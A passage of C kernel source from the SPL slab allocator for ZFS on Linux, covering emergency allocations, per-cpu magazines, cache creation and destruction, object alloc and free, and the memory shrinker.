ske_tmp = container_of(*new, spl_kmem_emergency_t, ske_node);
parent = *new;
if (address < ske_tmp->ske_obj)
new = &((*new)->rb_left);
else if (address > ske_tmp->ske_obj)
new = &((*new)->rb_right);
else
return (0);
}
rb_link_node(&ske->ske_node, parent, new);
rb_insert_color(&ske->ske_node, root);
return (1);
}
/*
* Allocate a single emergency object and track it in a red black tree.
*/
static int
spl_emergency_alloc(spl_kmem_cache_t *skc, int flags, void **obj)
{
gfp_t lflags = kmem_flags_convert(flags);
spl_kmem_emergency_t *ske;
int order = get_order(skc->skc_obj_size);
int empty;
/* Last chance use a partial slab if one now exists */
spin_lock(&skc->skc_lock);
empty = list_empty(&skc->skc_partial_list);
spin_unlock(&skc->skc_lock);
if (!empty)
return (-EEXIST);
ske = kmalloc(sizeof (*ske), lflags);
if (ske == NULL)
return (-ENOMEM);
ske->ske_obj = __get_free_pages(lflags, order);
if (ske->ske_obj == 0) {
kfree(ske);
return (-ENOMEM);
}
spin_lock(&skc->skc_lock);
empty = spl_emergency_insert(&skc->skc_emergency_tree, ske);
if (likely(empty)) {
skc->skc_obj_total++;
skc->skc_obj_emergency++;
if (skc->skc_obj_emergency > skc->skc_obj_emergency_max)
skc->skc_obj_emergency_max = skc->skc_obj_emergency;
}
spin_unlock(&skc->skc_lock);
if (unlikely(!empty)) {
free_pages(ske->ske_obj, order);
kfree(ske);
return (-EINVAL);
}
*obj = (void *)ske->ske_obj;
return (0);
}
/*
* Locate the passed object in the red black tree and free it.
*/
static int
spl_emergency_free(spl_kmem_cache_t *skc, void *obj)
{
spl_kmem_emergency_t *ske;
int order = get_order(skc->skc_obj_size);
spin_lock(&skc->skc_lock);
ske = spl_emergency_search(&skc->skc_emergency_tree, obj);
if (ske) {
rb_erase(&ske->ske_node, &skc->skc_emergency_tree);
skc->skc_obj_emergency--;
skc->skc_obj_total--;
}
spin_unlock(&skc->skc_lock);
if (ske == NULL)
return (-ENOENT);
free_pages(ske->ske_obj, order);
kfree(ske);
return (0);
}
/*
* Release objects from the per-cpu magazine back to their slab. The flush
* argument contains the max number of entries to remove from the magazine.
*/
static void
__spl_cache_flush(spl_kmem_cache_t *skc, spl_kmem_magazine_t *skm, int flush)
{
int i, count = MIN(flush, skm->skm_avail);
ASSERT(skc->skc_magic == SKC_MAGIC);
ASSERT(skm->skm_magic == SKM_MAGIC);
ASSERT(spin_is_locked(&skc->skc_lock));
for (i = 0; i < count; i++)
spl_cache_shrink(skc, skm->skm_objs[i]);
skm->skm_avail -= count;
memmove(skm->skm_objs, &(skm->skm_objs[count]),
sizeof (void *) * skm->skm_avail);
}
static void
spl_cache_flush(spl_kmem_cache_t *skc, spl_kmem_magazine_t *skm, int flush)
{
spin_lock(&skc->skc_lock);
__spl_cache_flush(skc, skm, flush);
spin_unlock(&skc->skc_lock);
}
static void
spl_magazine_age(void *data)
{
spl_kmem_cache_t *skc = (spl_kmem_cache_t *)data;
spl_kmem_magazine_t *skm = skc->skc_mag[smp_processor_id()];
ASSERT(skm->skm_magic == SKM_MAGIC);
ASSERT(skm->skm_cpu == smp_processor_id());
ASSERT(irqs_disabled());
/* There are no available objects or they are too young to age out */
if ((skm->skm_avail == 0) ||
time_before(jiffies, skm->skm_age + skc->skc_delay * HZ))
return;
/*
* Because we're executing in interrupt context we may have
* interrupted the holder of this lock. To avoid a potential
* deadlock return if the lock is contended.
*/
if (!spin_trylock(&skc->skc_lock))
return;
__spl_cache_flush(skc, skm, skm->skm_refill);
spin_unlock(&skc->skc_lock);
}
/*
* Called regularly to keep a downward pressure on the cache.
*
* Objects older than skc->skc_delay seconds in the per-cpu magazines will
* be returned to the caches. This is done to prevent idle magazines from
* holding memory which could be better used elsewhere. The delay is
* present to prevent thrashing the magazine.
*
* The newly released objects may result in empty partial slabs. Those
* slabs should be released to the system. Otherwise moving the objects
* out of the magazines is just wasted work.
*/
static void
spl_cache_age(void *data)
{
spl_kmem_cache_t *skc = (spl_kmem_cache_t *)data;
taskqid_t id = 0;
ASSERT(skc->skc_magic == SKC_MAGIC);
/* Dynamically disabled at run time */
if (!(spl_kmem_cache_expire & KMC_EXPIRE_AGE))
return;
atomic_inc(&skc->skc_ref);
if (!(skc->skc_flags & KMC_NOMAGAZINE))
on_each_cpu(spl_magazine_age, skc, 1);
spl_slab_reclaim(skc);
while (!test_bit(KMC_BIT_DESTROY, &skc->skc_flags) && !id) {
id = taskq_dispatch_delay(
spl_kmem_cache_taskq, spl_cache_age, skc, TQ_SLEEP,
ddi_get_lbolt() + skc->skc_delay / 3 * HZ);
/* Destroy issued after dispatch immediately cancel it */
if (test_bit(KMC_BIT_DESTROY, &skc->skc_flags) && id)
taskq_cancel_id(spl_kmem_cache_taskq, id);
}
spin_lock(&skc->skc_lock);
skc->skc_taskqid = id;
spin_unlock(&skc->skc_lock);
atomic_dec(&skc->skc_ref);
}
/*
* Size a slab based on the size of each aligned object plus spl_kmem_obj_t.
* When on-slab we want to target spl_kmem_cache_obj_per_slab. However,
* for very small objects we may end up with more than this so as not
* to waste space in the minimal allocation of a single page. Also for
* very large objects we may use as few as spl_kmem_cache_obj_per_slab_min,
* lower than this and we will fail.
*/
static int
spl_slab_size(spl_kmem_cache_t *skc, uint32_t *objs, uint32_t *size)
{
uint32_t sks_size, obj_size, max_size, tgt_size, tgt_objs;
if (skc->skc_flags & KMC_OFFSLAB) {
tgt_objs = spl_kmem_cache_obj_per_slab;
tgt_size = P2ROUNDUP(sizeof (spl_kmem_slab_t), PAGE_SIZE);
if ((skc->skc_flags & KMC_KMEM) &&
(spl_obj_size(skc) > (SPL_MAX_ORDER_NR_PAGES * PAGE_SIZE)))
return (-ENOSPC);
} else {
sks_size = spl_sks_size(skc);
obj_size = spl_obj_size(skc);
max_size = (spl_kmem_cache_max_size * 1024 * 1024);
tgt_size = (spl_kmem_cache_obj_per_slab * obj_size + sks_size);
/*
* KMC_KMEM slabs are allocated by __get_free_pages() which
* rounds up to the nearest order. Knowing this the size
* should be rounded up to the next power of two with a hard
* maximum defined by the maximum allowed allocation order.
*/
if (skc->skc_flags & KMC_KMEM) {
max_size = SPL_MAX_ORDER_NR_PAGES * PAGE_SIZE;
tgt_size = MIN(max_size,
PAGE_SIZE * (1 << MAX(get_order(tgt_size) - 1, 1)));
}
if (tgt_size <= max_size) {
tgt_objs = (tgt_size - sks_size) / obj_size;
} else {
tgt_objs = (max_size - sks_size) / obj_size;
tgt_size = (tgt_objs * obj_size) + sks_size;
}
}
if (tgt_objs == 0)
return (-ENOSPC);
*objs = tgt_objs;
*size = tgt_size;
return (0);
}
/*
* Make a guess at reasonable per-cpu magazine size based on the size of
* each object and the cost of caching N of them in each magazine. Long
* term this should really adapt based on an observed usage heuristic.
*/
static int
spl_magazine_size(spl_kmem_cache_t *skc)
{
uint32_t obj_size = spl_obj_size(skc);
int size;
if (spl_kmem_cache_magazine_size > 0)
return (MAX(MIN(spl_kmem_cache_magazine_size, 256), 2));
/* Per-magazine sizes below assume a 4Kib page size */
if (obj_size > (PAGE_SIZE * 256))
size = 4; /* Minimum 4Mib per-magazine */
else if (obj_size > (PAGE_SIZE * 32))
size = 16; /* Minimum 2Mib per-magazine */
else if (obj_size > (PAGE_SIZE))
size = 64; /* Minimum 256Kib per-magazine */
else if (obj_size > (PAGE_SIZE / 4))
size = 128; /* Minimum 128Kib per-magazine */
else
size = 256;
return (size);
}
/*
* Allocate a per-cpu magazine to associate with a specific core.
*/
static spl_kmem_magazine_t *
spl_magazine_alloc(spl_kmem_cache_t *skc, int cpu)
{
spl_kmem_magazine_t *skm;
int size = sizeof (spl_kmem_magazine_t) +
sizeof (void *) * skc->skc_mag_size;
skm = kmalloc_node(size, GFP_KERNEL, cpu_to_node(cpu));
if (skm) {
skm->skm_magic = SKM_MAGIC;
skm->skm_avail = 0;
skm->skm_size = skc->skc_mag_size;
skm->skm_refill = skc->skc_mag_refill;
skm->skm_cache = skc;
skm->skm_age = jiffies;
skm->skm_cpu = cpu;
}
return (skm);
}
/*
* Free a per-cpu magazine associated with a specific core.
*/
static void
spl_magazine_free(spl_kmem_magazine_t *skm)
{
ASSERT(skm->skm_magic == SKM_MAGIC);
ASSERT(skm->skm_avail == 0);
kfree(skm);
}
/*
* Create all pre-cpu magazines of reasonable sizes.
*/
static int
spl_magazine_create(spl_kmem_cache_t *skc)
{
int i;
if (skc->skc_flags & KMC_NOMAGAZINE)
return (0);
skc->skc_mag_size = spl_magazine_size(skc);
skc->skc_mag_refill = (skc->skc_mag_size + 1) / 2;
for_each_online_cpu(i) {
skc->skc_mag[i] = spl_magazine_alloc(skc, i);
if (!skc->skc_mag[i]) {
for (i--; i >= 0; i--)
spl_magazine_free(skc->skc_mag[i]);
return (-ENOMEM);
}
}
return (0);
}
/*
* Destroy all pre-cpu magazines.
*/
static void
spl_magazine_destroy(spl_kmem_cache_t *skc)
{
spl_kmem_magazine_t *skm;
int i;
if (skc->skc_flags & KMC_NOMAGAZINE)
return;
for_each_online_cpu(i) {
skm = skc->skc_mag[i];
spl_cache_flush(skc, skm, skm->skm_avail);
spl_magazine_free(skm);
}
}
/*
* Create a object cache based on the following arguments:
* name cache name
* size cache object size
* align cache object alignment
* ctor cache object constructor
* dtor cache object destructor
* reclaim cache object reclaim
* priv cache private data for ctor/dtor/reclaim
* vmp unused must be NULL
* flags
* KMC_NOTOUCH Disable cache object aging (unsupported)
* KMC_NODEBUG Disable debugging (unsupported)
* KMC_NOHASH Disable hashing (unsupported)
* KMC_QCACHE Disable qcache (unsupported)
* KMC_NOMAGAZINE Enabled for kmem/vmem, Disabled for Linux slab
* KMC_KMEM Force kmem backed cache
* KMC_VMEM Force vmem backed cache
* KMC_SLAB Force Linux slab backed cache
* KMC_OFFSLAB Locate objects off the slab
*/
spl_kmem_cache_t *
spl_kmem_cache_create(char *name, size_t size, size_t align,
spl_kmem_ctor_t ctor, spl_kmem_dtor_t dtor, spl_kmem_reclaim_t reclaim,
void *priv, void *vmp, int flags)
{
gfp_t lflags = kmem_flags_convert(KM_SLEEP);
spl_kmem_cache_t *skc;
int rc;
/*
* Unsupported flags
*/
ASSERT0(flags & KMC_NOMAGAZINE);
ASSERT0(flags & KMC_NOHASH);
ASSERT0(flags & KMC_QCACHE);
ASSERT(vmp == NULL);
might_sleep();
/*
* Allocate memory for a new cache and initialize it. Unfortunately,
* this usually ends up being a large allocation of ~32k because
* we need to allocate enough memory for the worst case number of
* cpus in the magazine, skc_mag[NR_CPUS].
*/
skc = kzalloc(sizeof (*skc), lflags);
if (skc == NULL)
return (NULL);
skc->skc_magic = SKC_MAGIC;
skc->skc_name_size = strlen(name) + 1;
skc->skc_name = (char *)kmalloc(skc->skc_name_size, lflags);
if (skc->skc_name == NULL) {
kfree(skc);
return (NULL);
}
strncpy(skc->skc_name, name, skc->skc_name_size);
skc->skc_ctor = ctor;
skc->skc_dtor = dtor;
skc->skc_reclaim = reclaim;
skc->skc_private = priv;
skc->skc_vmp = vmp;
skc->skc_linux_cache = NULL;
skc->skc_flags = flags;
skc->skc_obj_size = size;
skc->skc_obj_align = SPL_KMEM_CACHE_ALIGN;
skc->skc_delay = SPL_KMEM_CACHE_DELAY;
skc->skc_reap = SPL_KMEM_CACHE_REAP;
atomic_set(&skc->skc_ref, 0);
INIT_LIST_HEAD(&skc->skc_list);
INIT_LIST_HEAD(&skc->skc_complete_list);
INIT_LIST_HEAD(&skc->skc_partial_list);
skc->skc_emergency_tree = RB_ROOT;
spin_lock_init(&skc->skc_lock);
init_waitqueue_head(&skc->skc_waitq);
skc->skc_slab_fail = 0;
skc->skc_slab_create = 0;
skc->skc_slab_destroy = 0;
skc->skc_slab_total = 0;
skc->skc_slab_alloc = 0;
skc->skc_slab_max = 0;
skc->skc_obj_total = 0;
skc->skc_obj_alloc = 0;
skc->skc_obj_max = 0;
skc->skc_obj_deadlock = 0;
skc->skc_obj_emergency = 0;
skc->skc_obj_emergency_max = 0;
/*
* Verify the requested alignment restriction is sane.
*/
if (align) {
VERIFY(ISP2(align));
VERIFY3U(align, >=, SPL_KMEM_CACHE_ALIGN);
VERIFY3U(align, <=, PAGE_SIZE);
skc->skc_obj_align = align;
}
/*
* When no specific type of slab is requested (kmem, vmem, or
* linuxslab) then select a cache type based on the object size
* and default tunables.
*/
if (!(skc->skc_flags & (KMC_KMEM | KMC_VMEM | KMC_SLAB))) {
/*
* Objects smaller than spl_kmem_cache_slab_limit can
* use the Linux slab for better space-efficiency. By
* default this functionality is disabled until its
* performance characteristics are fully understood.
*/
if (spl_kmem_cache_slab_limit &&
size <= (size_t)spl_kmem_cache_slab_limit)
skc->skc_flags |= KMC_SLAB;
/*
* Small objects, less than spl_kmem_cache_kmem_limit per
* object should use kmem because their slabs are small.
*/
else if (spl_obj_size(skc) <= spl_kmem_cache_kmem_limit)
skc->skc_flags |= KMC_KMEM;
/*
* All other objects are considered large and are placed
* on vmem backed slabs.
*/
else
skc->skc_flags |= KMC_VMEM;
}
/*
* Given the type of slab allocate the required resources.
*/
if (skc->skc_flags & (KMC_KMEM | KMC_VMEM)) {
rc = spl_slab_size(skc,
&skc->skc_slab_objs, &skc->skc_slab_size);
if (rc)
goto out;
rc = spl_magazine_create(skc);
if (rc)
goto out;
} else {
if (size > (SPL_MAX_KMEM_ORDER_NR_PAGES * PAGE_SIZE)) {
rc = EINVAL;
goto out;
}
skc->skc_linux_cache = kmem_cache_create(
skc->skc_name, size, align, 0, NULL);
if (skc->skc_linux_cache == NULL) {
rc = ENOMEM;
goto out;
}
#if defined(HAVE_KMEM_CACHE_ALLOCFLAGS)
skc->skc_linux_cache->allocflags |= __GFP_COMP;
#elif defined(HAVE_KMEM_CACHE_GFPFLAGS)
skc->skc_linux_cache->gfpflags |= __GFP_COMP;
#endif
skc->skc_flags |= KMC_NOMAGAZINE;
}
if (spl_kmem_cache_expire & KMC_EXPIRE_AGE)
skc->skc_taskqid = taskq_dispatch_delay(spl_kmem_cache_taskq,
spl_cache_age, skc, TQ_SLEEP,
ddi_get_lbolt() + skc->skc_delay / 3 * HZ);
down_write(&spl_kmem_cache_sem);
list_add_tail(&skc->skc_list, &spl_kmem_cache_list);
up_write(&spl_kmem_cache_sem);
return (skc);
out:
kfree(skc->skc_name);
kfree(skc);
return (NULL);
}
EXPORT_SYMBOL(spl_kmem_cache_create);
/*
* Register a move callback for cache defragmentation.
* XXX: Unimplemented but harmless to stub out for now.
*/
void
spl_kmem_cache_set_move(spl_kmem_cache_t *skc,
kmem_cbrc_t (move)(void *, void *, size_t, void *))
{
ASSERT(move != NULL);
}
EXPORT_SYMBOL(spl_kmem_cache_set_move);
/*
* Destroy a cache and all objects associated with the cache.
*/
void
spl_kmem_cache_destroy(spl_kmem_cache_t *skc)
{
DECLARE_WAIT_QUEUE_HEAD(wq);
taskqid_t id;
ASSERT(skc->skc_magic == SKC_MAGIC);
ASSERT(skc->skc_flags & (KMC_KMEM | KMC_VMEM | KMC_SLAB));
down_write(&spl_kmem_cache_sem);
list_del_init(&skc->skc_list);
up_write(&spl_kmem_cache_sem);
/* Cancel any and wait for any pending delayed tasks */
VERIFY(!test_and_set_bit(KMC_BIT_DESTROY, &skc->skc_flags));
spin_lock(&skc->skc_lock);
id = skc->skc_taskqid;
spin_unlock(&skc->skc_lock);
taskq_cancel_id(spl_kmem_cache_taskq, id);
/*
* Wait until all current callers complete, this is mainly
* to catch the case where a low memory situation triggers a
* cache reaping action which races with this destroy.
*/
wait_event(wq, atomic_read(&skc->skc_ref) == 0);
if (skc->skc_flags & (KMC_KMEM | KMC_VMEM)) {
spl_magazine_destroy(skc);
spl_slab_reclaim(skc);
} else {
ASSERT(skc->skc_flags & KMC_SLAB);
kmem_cache_destroy(skc->skc_linux_cache);
}
spin_lock(&skc->skc_lock);
/*
* Validate there are no objects in use and free all the
* spl_kmem_slab_t, spl_kmem_obj_t, and object buffers.
*/
ASSERT3U(skc->skc_slab_alloc, ==, 0);
ASSERT3U(skc->skc_obj_alloc, ==, 0);
ASSERT3U(skc->skc_slab_total, ==, 0);
ASSERT3U(skc->skc_obj_total, ==, 0);
ASSERT3U(skc->skc_obj_emergency, ==, 0);
ASSERT(list_empty(&skc->skc_complete_list));
spin_unlock(&skc->skc_lock);
kfree(skc->skc_name);
kfree(skc);
}
EXPORT_SYMBOL(spl_kmem_cache_destroy);
/*
* Allocate an object from a slab attached to the cache. This is used to
* repopulate the per-cpu magazine caches in batches when they run low.
*/
static void *
spl_cache_obj(spl_kmem_cache_t *skc, spl_kmem_slab_t *sks)
{
spl_kmem_obj_t *sko;
ASSERT(skc->skc_magic == SKC_MAGIC);
ASSERT(sks->sks_magic == SKS_MAGIC);
ASSERT(spin_is_locked(&skc->skc_lock));
sko = list_entry(sks->sks_free_list.next, spl_kmem_obj_t, sko_list);
ASSERT(sko->sko_magic == SKO_MAGIC);
ASSERT(sko->sko_addr != NULL);
/* Remove from sks_free_list */
list_del_init(&sko->sko_list);
sks->sks_age = jiffies;
sks->sks_ref++;
skc->skc_obj_alloc++;
/* Track max obj usage statistics */
if (skc->skc_obj_alloc > skc->skc_obj_max)
skc->skc_obj_max = skc->skc_obj_alloc;
/* Track max slab usage statistics */
if (sks->sks_ref == 1) {
skc->skc_slab_alloc++;
if (skc->skc_slab_alloc > skc->skc_slab_max)
skc->skc_slab_max = skc->skc_slab_alloc;
}
return (sko->sko_addr);
}
/*
* Generic slab allocation function to run by the global work queues.
* It is responsible for allocating a new slab, linking it in to the list
* of partial slabs, and then waking any waiters.
*/
static void
spl_cache_grow_work(void *data)
{
spl_kmem_alloc_t *ska = (spl_kmem_alloc_t *)data;
spl_kmem_cache_t *skc = ska->ska_cache;
spl_kmem_slab_t *sks;
#if defined(PF_MEMALLOC_NOIO)
unsigned noio_flag = memalloc_noio_save();
sks = spl_slab_alloc(skc, ska->ska_flags);
memalloc_noio_restore(noio_flag);
#else
fstrans_cookie_t cookie = spl_fstrans_mark();
sks = spl_slab_alloc(skc, ska->ska_flags);
spl_fstrans_unmark(cookie);
#endif
spin_lock(&skc->skc_lock);
if (sks) {
skc->skc_slab_total++;
skc->skc_obj_total += sks->sks_objs;
list_add_tail(&sks->sks_list, &skc->skc_partial_list);
}
atomic_dec(&skc->skc_ref);
smp_mb__before_atomic();
clear_bit(KMC_BIT_GROWING, &skc->skc_flags);
clear_bit(KMC_BIT_DEADLOCKED, &skc->skc_flags);
smp_mb__after_atomic();
wake_up_all(&skc->skc_waitq);
spin_unlock(&skc->skc_lock);
kfree(ska);
}
/*
* Returns non-zero when a new slab should be available.
*/
static int
spl_cache_grow_wait(spl_kmem_cache_t *skc)
{
return (!test_bit(KMC_BIT_GROWING, &skc->skc_flags));
}
/*
* No available objects on any slabs, create a new slab. Note that this
* functionality is disabled for KMC_SLAB caches which are backed by the
* Linux slab.
*/
static int
spl_cache_grow(spl_kmem_cache_t *skc, int flags, void **obj)
{
int remaining, rc = 0;
ASSERT0(flags & ~KM_PUBLIC_MASK);
ASSERT(skc->skc_magic == SKC_MAGIC);
ASSERT((skc->skc_flags & KMC_SLAB) == 0);
might_sleep();
*obj = NULL;
/*
* Before allocating a new slab wait for any reaping to complete and
* then return so the local magazine can be rechecked for new objects.
*/
if (test_bit(KMC_BIT_REAPING, &skc->skc_flags)) {
rc = spl_wait_on_bit(&skc->skc_flags, KMC_BIT_REAPING,
TASK_UNINTERRUPTIBLE);
return (rc ? rc : -EAGAIN);
}
/*
* This is handled by dispatching a work request to the global work
* queue. This allows us to asynchronously allocate a new slab while
* retaining the ability to safely fall back to a smaller synchronous
* allocations to ensure forward progress is always maintained.
*/
if (test_and_set_bit(KMC_BIT_GROWING, &skc->skc_flags) == 0) {
spl_kmem_alloc_t *ska;
ska = kmalloc(sizeof (*ska), kmem_flags_convert(flags));
if (ska == NULL) {
clear_bit_unlock(KMC_BIT_GROWING, &skc->skc_flags);
smp_mb__after_atomic();
wake_up_all(&skc->skc_waitq);
return (-ENOMEM);
}
atomic_inc(&skc->skc_ref);
ska->ska_cache = skc;
ska->ska_flags = flags;
taskq_init_ent(&ska->ska_tqe);
taskq_dispatch_ent(spl_kmem_cache_taskq,
spl_cache_grow_work, ska, 0, &ska->ska_tqe);
}
/*
* The goal here is to only detect the rare case where a virtual slab
* allocation has deadlocked. We must be careful to minimize the use
* of emergency objects which are more expensive to track. Therefore,
* we set a very long timeout for the asynchronous allocation and if
* the timeout is reached the cache is flagged as deadlocked. From
* this point only new emergency objects will be allocated until the
* asynchronous allocation completes and clears the deadlocked flag.
*/
if (test_bit(KMC_BIT_DEADLOCKED, &skc->skc_flags)) {
rc = spl_emergency_alloc(skc, flags, obj);
} else {
remaining = wait_event_timeout(skc->skc_waitq,
spl_cache_grow_wait(skc), HZ / 10);
if (!remaining) {
spin_lock(&skc->skc_lock);
if (test_bit(KMC_BIT_GROWING, &skc->skc_flags)) {
set_bit(KMC_BIT_DEADLOCKED, &skc->skc_flags);
skc->skc_obj_deadlock++;
}
spin_unlock(&skc->skc_lock);
}
rc = -ENOMEM;
}
return (rc);
}
/*
* Refill a per-cpu magazine with objects from the slabs for this cache.
* Ideally the magazine can be repopulated using existing objects which have
* been released, however if we are unable to locate enough free objects new
* slabs of objects will be created. On success NULL is returned, otherwise
* the address of a single emergency object is returned for use by the caller.
*/
static void *
spl_cache_refill(spl_kmem_cache_t *skc, spl_kmem_magazine_t *skm, int flags)
{
spl_kmem_slab_t *sks;
int count = 0, rc, refill;
void *obj = NULL;
ASSERT(skc->skc_magic == SKC_MAGIC);
ASSERT(skm->skm_magic == SKM_MAGIC);
refill = MIN(skm->skm_refill, skm->skm_size - skm->skm_avail);
spin_lock(&skc->skc_lock);
while (refill > 0) {
/* No slabs available we may need to grow the cache */
if (list_empty(&skc->skc_partial_list)) {
spin_unlock(&skc->skc_lock);
local_irq_enable();
rc = spl_cache_grow(skc, flags, &obj);
local_irq_disable();
/* Emergency object for immediate use by caller */
if (rc == 0 && obj != NULL)
return (obj);
if (rc)
goto out;
/* Rescheduled to different CPU skm is not local */
if (skm != skc->skc_mag[smp_processor_id()])
goto out;
/*
* Potentially rescheduled to the same CPU but
* allocations may have occurred from this CPU while
* we were sleeping so recalculate max refill.
*/
refill = MIN(refill, skm->skm_size - skm->skm_avail);
spin_lock(&skc->skc_lock);
continue;
}
/* Grab the next available slab */
sks = list_entry((&skc->skc_partial_list)->next,
spl_kmem_slab_t, sks_list);
ASSERT(sks->sks_magic == SKS_MAGIC);
ASSERT(sks->sks_ref < sks->sks_objs);
ASSERT(!list_empty(&sks->sks_free_list));
/*
* Consume as many objects as needed to refill the requested
* cache. We must also be careful not to overfill it.
*/
while (sks->sks_ref < sks->sks_objs && refill-- > 0 &&
++count) {
ASSERT(skm->skm_avail < skm->skm_size);
ASSERT(count < skm->skm_size);
skm->skm_objs[skm->skm_avail++] =
spl_cache_obj(skc, sks);
}
/* Move slab to skc_complete_list when full */
if (sks->sks_ref == sks->sks_objs) {
list_del(&sks->sks_list);
list_add(&sks->sks_list, &skc->skc_complete_list);
}
}
spin_unlock(&skc->skc_lock);
out:
return (NULL);
}
/*
* Release an object back to the slab from which it came.
*/
static void
spl_cache_shrink(spl_kmem_cache_t *skc, void *obj)
{
spl_kmem_slab_t *sks = NULL;
spl_kmem_obj_t *sko = NULL;
ASSERT(skc->skc_magic == SKC_MAGIC);
ASSERT(spin_is_locked(&skc->skc_lock));
sko = spl_sko_from_obj(skc, obj);
ASSERT(sko->sko_magic == SKO_MAGIC);
sks = sko->sko_slab;
ASSERT(sks->sks_magic == SKS_MAGIC);
ASSERT(sks->sks_cache == skc);
list_add(&sko->sko_list, &sks->sks_free_list);
sks->sks_age = jiffies;
sks->sks_ref--;
skc->skc_obj_alloc--;
/*
* Move slab to skc_partial_list when no longer full. Slabs
* are added to the head to keep the partial list is quasi-full
* sorted order. Fuller at the head, emptier at the tail.
*/
if (sks->sks_ref == (sks->sks_objs - 1)) {
list_del(&sks->sks_list);
list_add(&sks->sks_list, &skc->skc_partial_list);
}
/*
* Move empty slabs to the end of the partial list so
* they can be easily found and freed during reclamation.
*/
if (sks->sks_ref == 0) {
list_del(&sks->sks_list);
list_add_tail(&sks->sks_list, &skc->skc_partial_list);
skc->skc_slab_alloc--;
}
}
/*
* Allocate an object from the per-cpu magazine, or if the magazine
* is empty directly allocate from a slab and repopulate the magazine.
*/
void *
spl_kmem_cache_alloc(spl_kmem_cache_t *skc, int flags)
{
spl_kmem_magazine_t *skm;
void *obj = NULL;
ASSERT0(flags & ~KM_PUBLIC_MASK);
ASSERT(skc->skc_magic == SKC_MAGIC);
ASSERT(!test_bit(KMC_BIT_DESTROY, &skc->skc_flags));
atomic_inc(&skc->skc_ref);
/*
* Allocate directly from a Linux slab. All optimizations are left
* to the underlying cache we only need to guarantee that KM_SLEEP
* callers will never fail.
*/
if (skc->skc_flags & KMC_SLAB) {
struct kmem_cache *slc = skc->skc_linux_cache;
do {
obj = kmem_cache_alloc(slc, kmem_flags_convert(flags));
} while ((obj == NULL) && !(flags & KM_NOSLEEP));
goto ret;
}
local_irq_disable();
restart:
/*
* Safe to update per-cpu structure without lock, but
* in the restart case we must be careful to reacquire
* the local magazine since this may have changed
* when we need to grow the cache.
*/
skm = skc->skc_mag[smp_processor_id()];
ASSERT(skm->skm_magic == SKM_MAGIC);
if (likely(skm->skm_avail)) {
/* Object available in CPU cache, use it */
obj = skm->skm_objs[--skm->skm_avail];
skm->skm_age = jiffies;
} else {
obj = spl_cache_refill(skc, skm, flags);
if ((obj == NULL) && !(flags & KM_NOSLEEP))
goto restart;
local_irq_enable();
goto ret;
}
local_irq_enable();
ASSERT(obj);
ASSERT(IS_P2ALIGNED(obj, skc->skc_obj_align));
ret:
/* Pre-emptively migrate object to CPU L1 cache */
if (obj) {
if (obj && skc->skc_ctor)
skc->skc_ctor(obj, skc->skc_private, flags);
else
prefetchw(obj);
}
atomic_dec(&skc->skc_ref);
return (obj);
}
EXPORT_SYMBOL(spl_kmem_cache_alloc);
/*
* Free an object back to the local per-cpu magazine, there is no
* guarantee that this is the same magazine the object was originally
* allocated from. We may need to flush entire from the magazine
* back to the slabs to make space.
*/
void
spl_kmem_cache_free(spl_kmem_cache_t *skc, void *obj)
{
spl_kmem_magazine_t *skm;
unsigned long flags;
int do_reclaim = 0;
int do_emergency = 0;
ASSERT(skc->skc_magic == SKC_MAGIC);
ASSERT(!test_bit(KMC_BIT_DESTROY, &skc->skc_flags));
atomic_inc(&skc->skc_ref);
/*
* Run the destructor
*/
if (skc->skc_dtor)
skc->skc_dtor(obj, skc->skc_private);
/*
* Free the object from the Linux underlying Linux slab.
*/
if (skc->skc_flags & KMC_SLAB) {
kmem_cache_free(skc->skc_linux_cache, obj);
goto out;
}
/*
* While a cache has outstanding emergency objects all freed objects
* must be checked. However, since emergency objects will never use
* a virtual address these objects can be safely excluded as an
* optimization.
*/
if (!is_vmalloc_addr(obj)) {
spin_lock(&skc->skc_lock);
do_emergency = (skc->skc_obj_emergency > 0);
spin_unlock(&skc->skc_lock);
if (do_emergency && (spl_emergency_free(skc, obj) == 0))
goto out;
}
local_irq_save(flags);
/*
* Safe to update per-cpu structure without lock, but
* no remote memory allocation tracking is being performed
* it is entirely possible to allocate an object from one
* CPU cache and return it to another.
*/
skm = skc->skc_mag[smp_processor_id()];
ASSERT(skm->skm_magic == SKM_MAGIC);
/*
* Per-CPU cache full, flush it to make space for this object,
* this may result in an empty slab which can be reclaimed once
* interrupts are re-enabled.
*/
if (unlikely(skm->skm_avail >= skm->skm_size)) {
spl_cache_flush(skc, skm, skm->skm_refill);
do_reclaim = 1;
}
/* Available space in cache, use it */
skm->skm_objs[skm->skm_avail++] = obj;
local_irq_restore(flags);
if (do_reclaim)
spl_slab_reclaim(skc);
out:
atomic_dec(&skc->skc_ref);
}
EXPORT_SYMBOL(spl_kmem_cache_free);
/*
* The generic shrinker function for all caches. Under Linux a shrinker
* may not be tightly coupled with a slab cache. In fact Linux always
* systematically tries calling all registered shrinker callbacks which
* report that they contain unused objects. Because of this we only
* register one shrinker function in the shim layer for all slab caches.
* We always attempt to shrink all caches when this generic shrinker
* is called.
*
* If sc->nr_to_scan is zero, the caller is requesting a query of the
* number of objects which can potentially be freed. If it is nonzero,
* the request is to free that many objects.
*
* Linux kernels >= 3.12 have the count_objects and scan_objects callbacks
* in struct shrinker and also require the shrinker to return the number
* of objects freed.
*
* Older kernels require the shrinker to return the number of freeable
* objects following the freeing of nr_to_free.
*
* Linux semantics differ from those under Solaris, which are to
* free all available objects which may (and probably will) be more
* objects than the requested nr_to_scan.
*/
static spl_shrinker_t
__spl_kmem_cache_generic_shrinker(struct shrinker *shrink,
struct shrink_control *sc)
{
spl_kmem_cache_t *skc;
int alloc = 0;
/*
* No shrinking in a transaction context. Can cause deadlocks.
*/
if (sc->nr_to_scan && spl_fstrans_check())
return (SHRINK_STOP);
down_read(&spl_kmem_cache_sem);
list_for_each_entry(skc, &spl_kmem_cache_list, skc_list) {
if (sc->nr_to_scan) {
#ifdef HAVE_SPLIT_SHRINKER_CALLBACK
uint64_t oldalloc = skc->skc_obj_alloc;
spl_kmem_cache_reap_now(skc,
MAX(sc->nr_to_scan>>fls64(skc->skc_slab_objs), 1));
if (oldalloc > skc->skc_obj_alloc)
alloc += oldalloc - skc->skc_obj_alloc;
#else
spl_kmem_cache_reap_now(skc,
MAX(sc->nr_to_scan>>fls64(skc->skc_slab_objs), 1));
alloc += skc->skc_obj_alloc;
#endif /* HAVE_SPLIT_SHRINKER_CALLBACK */
} else {
/* Request to query number of freeable objects */
alloc += skc->skc_obj_alloc;
}
}
up_read(&spl_kmem_cache_sem);
/*
* When KMC_RECLAIM_ONCE is set allow only a single reclaim pass.
